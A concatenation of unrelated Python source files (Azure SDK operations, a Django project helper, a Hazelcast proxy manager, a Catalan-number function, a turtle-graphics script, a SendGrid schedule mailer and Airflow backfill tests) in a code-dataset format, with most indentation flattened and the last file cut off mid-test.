'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'ipConfigurationName': self._serialize.url("ip_configuration_name", ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterfaceIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_ip_configuration.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations/{ipConfigurationName}'} # type: ignore
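# --- Illustrative usage sketch (editor's addition, not part of the generated file) ---
# NetworkInterfacesOperations is not instantiated directly; it is reached through the
# service client, which supplies the pipeline, serializer and configuration. The helper
# below is hypothetical and assumes the track-2 azure-mgmt-network and azure-identity
# packages; the resource names passed in are placeholders chosen by the caller.
def _example_delete_network_interface(subscription_id, resource_group_name, network_interface_name):
    from azure.identity import DefaultAzureCredential
    from azure.mgmt.network import NetworkManagementClient
    client = NetworkManagementClient(DefaultAzureCredential(), subscription_id)
    # begin_delete returns an LROPoller; result() blocks until the deletion completes.
    poller = client.network_interfaces.begin_delete(resource_group_name, network_interface_name)
    poller.result()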
|
py | 7df7e363ceb66e449fd98c8756adb9ef47474d0a | from .exceptions import ProjectCreationException
from django.conf import settings
import base64
import requests as r
import yaml
import re
import time
import modules.keycloak_lib as keylib
from .tasks import create_keycloak_client_task, create_helm_resources_task
def urlify(s):
# Remove all non-word characters (everything except numbers and letters)
s = re.sub(r"[^\w\s]", '', s)
# Replace all runs of whitespace with a single dash
s = re.sub(r"\s+", '-', s)
return s
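# Examples (editor's addition) of the slug produced by urlify():
#   urlify("Hello, World!") -> "Hello-World"
#   urlify("My   new    project") -> "My-new-project"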
def create_project_resources(project, username, repository=None):
res1 = create_keycloak_client_task.delay(project.slug, username, [])
res2 = create_helm_resources_task.delay(project.slug, project.project_key, project.project_secret, repository)
# Wait for keycloak task to finish before returning (otherwise user wouldn't have
# correct Keycloak roles)
while not res1.ready():
time.sleep(0.1)
def delete_project_resources(project):
retval = r.get(settings.CHART_CONTROLLER_URL + '/delete?release={}'.format(str(project.slug)))
if retval:
# Delete Keycloak project client
kc = keylib.keycloak_init()
keylib.keycloak_delete_client(kc, project.slug)
scope_id = keylib.keycloak_get_client_scope_id(kc, project.slug+'-scope')
keylib.keycloak_delete_client_scope(kc, scope_id)
return True
return False
def get_minio_keys(project):
return {
'project_key': decrypt_key(project.project_key),
'project_secret': decrypt_key(project.project_secret)
}
def decrypt_key(key):
base64_bytes = key.encode('ascii')
result = base64.b64decode(base64_bytes)
return result.decode('ascii')
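# Note (editor's addition): despite its name, decrypt_key() only reverses a base64
# encoding; the project keys are stored encoded, not encrypted. A hypothetical round trip:
#   encoded = base64.b64encode("my-minio-key".encode('ascii')).decode('ascii')
#   assert decrypt_key(encoded) == "my-minio-key"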
|
py | 7df7e58153bebb8d522a4cb6421674396f7656eb | from django.http import HttpResponse
from django.template import Context, Template
from gaeapi.appengine.api import users
def test(request):
t = Template('Test view')
c = Context({'user': request.user,
'is_admin': users.is_current_user_admin()})
return HttpResponse(t.render(c))
|
py | 7df7e5f7c9c2b9ad8f15ed56cf0ffca3e832dcc0 | from hazelcast.protocol.codec import client_create_proxy_codec, client_destroy_proxy_codec
from hazelcast.proxy.atomic_long import AtomicLong
from hazelcast.proxy.atomic_reference import AtomicReference
from hazelcast.proxy.count_down_latch import CountDownLatch
from hazelcast.proxy.executor import Executor
from hazelcast.proxy.id_generator import IdGenerator
from hazelcast.proxy.list import List
from hazelcast.proxy.lock import Lock
from hazelcast.proxy.map import create_map_proxy
from hazelcast.proxy.multi_map import MultiMap
from hazelcast.proxy.queue import Queue
from hazelcast.proxy.reliable_topic import ReliableTopic
from hazelcast.proxy.replicated_map import ReplicatedMap
from hazelcast.proxy.ringbuffer import Ringbuffer
from hazelcast.proxy.semaphore import Semaphore
from hazelcast.proxy.set import Set
from hazelcast.proxy.topic import Topic
from hazelcast.proxy.pn_counter import PNCounter
from hazelcast.proxy.flake_id_generator import FlakeIdGenerator
ATOMIC_LONG_SERVICE = "hz:impl:atomicLongService"
ATOMIC_REFERENCE_SERVICE = "hz:impl:atomicReferenceService"
COUNT_DOWN_LATCH_SERVICE = "hz:impl:countDownLatchService"
ID_GENERATOR_SERVICE = "hz:impl:idGeneratorService"
EXECUTOR_SERVICE = "hz:impl:executorService"
LOCK_SERVICE = "hz:impl:lockService"
LIST_SERVICE = "hz:impl:listService"
MULTI_MAP_SERVICE = "hz:impl:multiMapService"
MAP_SERVICE = "hz:impl:mapService"
RELIABLE_TOPIC_SERVICE = "hz:impl:reliableTopicService"
REPLICATED_MAP_SERVICE = "hz:impl:replicatedMapService"
RINGBUFFER_SERIVCE = "hz:impl:ringbufferService"
SEMAPHORE_SERVICE = "hz:impl:semaphoreService"
SET_SERVICE = "hz:impl:setService"
QUEUE_SERVICE = "hz:impl:queueService"
TOPIC_SERVICE = "hz:impl:topicService"
PN_COUNTER_SERVICE = "hz:impl:PNCounterService"
FLAKE_ID_GENERATOR_SERVICE = "hz:impl:flakeIdGeneratorService"
ID_GENERATOR_ATOMIC_LONG_PREFIX = "hz:atomic:idGenerator:"
_proxy_init = {
ATOMIC_LONG_SERVICE: AtomicLong,
ATOMIC_REFERENCE_SERVICE: AtomicReference,
COUNT_DOWN_LATCH_SERVICE: CountDownLatch,
ID_GENERATOR_SERVICE: IdGenerator,
EXECUTOR_SERVICE: Executor,
LIST_SERVICE: List,
LOCK_SERVICE: Lock,
MAP_SERVICE: create_map_proxy,
MULTI_MAP_SERVICE: MultiMap,
QUEUE_SERVICE: Queue,
RELIABLE_TOPIC_SERVICE: ReliableTopic,
REPLICATED_MAP_SERVICE: ReplicatedMap,
RINGBUFFER_SERIVCE: Ringbuffer,
SEMAPHORE_SERVICE: Semaphore,
SET_SERVICE: Set,
TOPIC_SERVICE: Topic,
PN_COUNTER_SERVICE: PNCounter,
FLAKE_ID_GENERATOR_SERVICE: FlakeIdGenerator
}
class ProxyManager(object):
def __init__(self, client):
self._client = client
self._proxies = {}
def get_or_create(self, service_name, name, **kwargs):
ns = (service_name, name)
if ns in self._proxies:
return self._proxies[ns]
proxy = self.create_proxy(service_name, name, **kwargs)
self._proxies[ns] = proxy
return proxy
def create_proxy(self, service_name, name, **kwargs):
message = client_create_proxy_codec.encode_request(name=name, service_name=service_name,
target=self._find_next_proxy_address())
self._client.invoker.invoke_on_random_target(message).result()
return _proxy_init[service_name](client=self._client, service_name=service_name, name=name, **kwargs)
def destroy_proxy(self, service_name, name):
ns = (service_name, name)
try:
self._proxies.pop(ns)
message = client_destroy_proxy_codec.encode_request(name=name, service_name=service_name)
self._client.invoker.invoke_on_random_target(message).result()
return True
except KeyError:
return False
def _find_next_proxy_address(self):
# TODO: filter out lite members
return self._client.load_balancer.next_address()
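# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# ProxyManager backs the public client API: each distributed-object accessor on the
# client resolves to get_or_create() with one of the service-name constants above.
# The helper below is hypothetical and assumes an already-connected client instance.
def _example_get_cached_map_proxy(client):
    proxy_manager = ProxyManager(client)
    first = proxy_manager.get_or_create(MAP_SERVICE, "my-distributed-map")
    second = proxy_manager.get_or_create(MAP_SERVICE, "my-distributed-map")
    # The second lookup is served from the local cache, not a new cluster round-trip.
    assert first is second
    return first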
|
py | 7df7e802d928f854d81cc5fde90ec5140d09b768 | """
Given n, how many structurally unique BST's (binary search trees) can store values 1 ... n?
Example:
Input: 3, Output: 5
Explanation:
Given n = 3, there are a total of 5 unique BST's:
1 3 3 2 1
\ / / / \ \
3 2 1 1 3 2
/ / \ \
2 1 2 3
"""
"""
This problem is equivalent to finding the Catalan numbers: https://en.wikipedia.org/wiki/Catalan_number. Once this has
been recognised we can implement that formula directly.
"""
from math import factorial
def num_trees(n):
return factorial(2*n) // (factorial(n+1) * factorial(n))
assert num_trees(3) == 5
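# --- Alternative sketch (editor's addition) ---
# The same count can be derived without the closed form: a BST on k keys picks a root,
# leaving i nodes for the left subtree and k - 1 - i for the right, which gives the
# Catalan recurrence C(k) = sum_{i=0}^{k-1} C(i) * C(k-1-i).
def num_trees_dp(n):
    counts = [1] + [0] * n  # counts[k] = number of unique BSTs with k nodes
    for k in range(1, n + 1):
        counts[k] = sum(counts[i] * counts[k - 1 - i] for i in range(k))
    return counts[n]
assert num_trees_dp(3) == 5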
|
py | 7df7e85a1689cebaa6f1dbc227b951f915c7b48a | import turtle
opcaoCor = input("Qual a cor de fundo do jogo? \n1. Branco\n2.Verde\n")
janela = turtle.Screen()
if (opcaoCor == "1"):
janela.bgcolor("white") # muda a cor do background da janela p/ branca
elif (opcaoCor == "2"):
janela.bgcolor("lightgreen") # muda a cor do background da janela p/verde
else:
print("Opção inválida. Cor rosa será usada")
janela.bgcolor("pink")
alex = turtle.Turtle() # create the turtle alex
alex.shape("turtle")
alex.color("blue") # change the turtle's color
alex.speed(1) # change the turtle's speed [0-10]
alex.forward(80) # tell alex to move 80 units forward
alex.left(90) # tell alex to turn 90 degrees to the left
alex.forward(80)
alex.left(90)
alex.forward(80)
alex.left(90)
alex.forward(80)
alex.left(90)
alex.color("gray") # muda a cor de alex
for k in range(4): # repita 4 vezes o código abaixo
alex.forward(80) # manda alex andar 80 unidades pra frente
alex.left(90) # manda alex virar 90 graus para a esquerda
janela.exitonclick() |
py | 7df7e8878c496cae7ee7fa563d7b8aad6dafc700 | import copy
import os
from dotenv import load_dotenv
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import (Attachment, Disposition, FileContent,
FileName, FileType, Mail)
from input_output import GSpreadAuthentication
from problem_solving import KandGProblem
from read_df import csvtodf, makeical
def main(path_input=None, dir_output=None, direct_in=False, local=False):
if direct_in:
if local:
# Enter the path to the Google API private key (JSON keyfile)
json_keyfile_name = "hoge/key_file_name.json"
# Enter the xxx part of https://docs.google.com/spreadsheets/d/xxx/...
spreadsheet_key = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
spreadsheet = GSpreadAuthentication(json_keyfile_name, spreadsheet_key)
else:
spreadsheet = GSpreadAuthentication()
df_kagisime, df_gomisute = spreadsheet.InputSchedule()
else:
path_input = input("Please enter path of schedule csv file:\n") if path_input is None else path_input
csvdata = csvtodf(path_input)
df_kagisime, df_gomisute = csvdata.df_input()
model = KandGProblem(df_kagisime, df_gomisute)
df_output = model.solve()
print(df_output)
print(df_output.index[0])
for name, series in df_output.iteritems():
print(name, series[5])
making_ical = makeical(df_output)
if direct_in:
spreadsheet.UpdateSpreadsheet(df_output)
mail_content_temp = spreadsheet.GetDecidedMailTemplate()
mail_content = copy.deepcopy(mail_content_temp)
print('mail_content', mail_content)
print('mail_content_temp', mail_content_temp, '\n\n')
if local:
df_output.to_csv(os.path.join(dir_output, csvdata.yyyymm + ' 配置.csv'), encoding='utf_8_sig')
dir_output = "./example" if dir_output is None else dir_output
if not (os.path.isdir(dir_output)):
os.mkdir(dir_output)
# Create an .ics file for each member
for to_mail, fname in zip(spreadsheet.to_mails, spreadsheet.FName):
member = to_mail[1]
encoded_file = making_ical.convert(member, fname) # create .ics files for everyone registered for garbage duty
mail_content['PlainTextContent'] = mail_content_temp['PlainTextContent'].replace('recipient', member)
if direct_in:
send_mail(encoded_file, to_mail, mail_content, spreadsheet.yyyymm+'_'+fname)
else:
with open(os.path.join(dir_output, csvdata.yyyymm+'_'+fname + '.ics'), mode='wb') as f:
f.write(encoded_file)
def send_mail(encoded_file, to_mail, mail_content, icsfilename):
attachedfile = Attachment(
FileContent(encoded_file),
FileName(icsfilename+'.ics'),
FileType('application/ics'),
Disposition('attachment')
)
to_emails = list((to_mail, tuple(os.environ['FROM_MAIL'].split())))
message = Mail(
from_email=tuple(os.environ['FROM_MAIL'].split()),
to_emails=to_emails,
subject=mail_content['Title'],
plain_text_content=mail_content['PlainTextContent'],
is_multiple=True)
message.attachment = attachedfile
try:
sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))
print(to_emails)
response = sg.send(message)
print(response.status_code)
print(response.body)
print(response.headers)
except Exception as e:
print(e)
if __name__ == '__main__':
load_dotenv(verbose=True)
dotenv_path = './.env'
load_dotenv(dotenv_path)
print(os.environ['EXAMPLE'])
path_input = "./example/GSS_test - 202111 予定表.csv" # Type path of schedule table csv file downloaded from spreadsheet unless direct_in=True.
dir_output = "./example" # Type path of output file(.ical, 予定表.csv).
main(path_input=None, dir_output=None, direct_in=True, local=False)
|
py | 7df7e8d08d80d5605a0cf00b27b9c3705c69a14a | # coding:utf-8
# --author-- binglu.wang
import zfused_maya.widgets.window as win
import zfused_maya.core.resource as resource
from zfused_maya.node.core.upload_asset import *
uiPath = resource.get("uis", "upload_asset.ui")
mainWindow = win.Window()
mainWindow.central_widget.setStyleSheet("background-color:#444444;")
mainWindow.set_title_name(u"upload_asset")
mainWindow.setFixedSize(680+15,550+55)
qtWinInst = Upload(uiPath,"Upload Asset (upload_asset)")
mainWindow.set_central_widget(qtWinInst.ui)
if __name__ == '__main__':
mainWindow.show()
|
py | 7df7eb8909a065b4a66b6a8dab90f3919d3e5b8a | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import logging
import multiprocessing
import os
import shutil
import six
import threading
import time
import unittest
from tempfile import mkdtemp
from airflow import AirflowException, settings, models
from airflow.bin import cli
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.net import get_hostname
from mock import Mock, patch, MagicMock, PropertyMock
from sqlalchemy.orm.session import make_transient
from tests.executors.test_executor import TestExecutor
from tests.core import TEST_DAG_FOLDER
from airflow import configuration
configuration.load_test_config()
import sqlalchemy
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
# Include the words "airflow" and "dag" in the file contents, tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id=='example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
"""
# some DAGs really are just examples... but try to make them work!
skip_dags = [
'example_http_operator',
'example_twitter_dag',
'example_trigger_target_dag',
'example_trigger_controller_dag', # tested above
'test_utils', # sleeps forever
'example_kubernetes_operator', # only works with k8s cluster
]
logger = logging.getLogger('BackfillJobTest.test_backfill_examples')
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id not in skip_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
Test for https://github.com/airbnb/airflow/pull/1225
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
